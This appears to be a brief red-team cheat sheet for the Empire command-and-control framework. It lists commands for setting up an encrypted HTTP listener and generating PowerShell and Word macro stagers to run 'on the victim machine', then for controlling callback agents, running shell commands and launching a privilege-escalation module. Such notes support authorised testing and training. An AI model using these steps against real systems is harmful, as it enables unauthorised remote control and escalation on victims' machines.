Empire

Basic command

To get back to home menu:

main

Listener

Use the listeners module:

listeners

For example, to create a http listener:

uselistener http

It is always recommended to encrypt our traffic! To do so:

$Empire/setup/cert.sh

A pem file and private key key file will be generated in the $Empire/data/ folder.

Then in listener configuration, to apply the cert:

set CertPath $Empire/data

Then execute!

execute

To view active listeners:

listeners

Stager

To start with:

usestager

multi/launcher

For example, use multi/launcher:

usestager multi/launcher

To see the options:

info

We have to specify our listener type:

set listener http

Execute!

execute

After this, a powershell script will be generated. Go on execute this script on the victim machine.

windows/macro

usestager windows/macro
set listener http
set outfile $Empire/data/macro
execute

C2

After the agent callbacks, see the agent using:

agents

To interact with the agent,

interact <AGENT_NAME>

To view the agent information:

info

To run shell command:

shell <command>

Modules

To search for modules, simply:

searchmodule <keyword>

For example, to use PowerUp AllCheck,

usemodule privesc/powerup/allchecks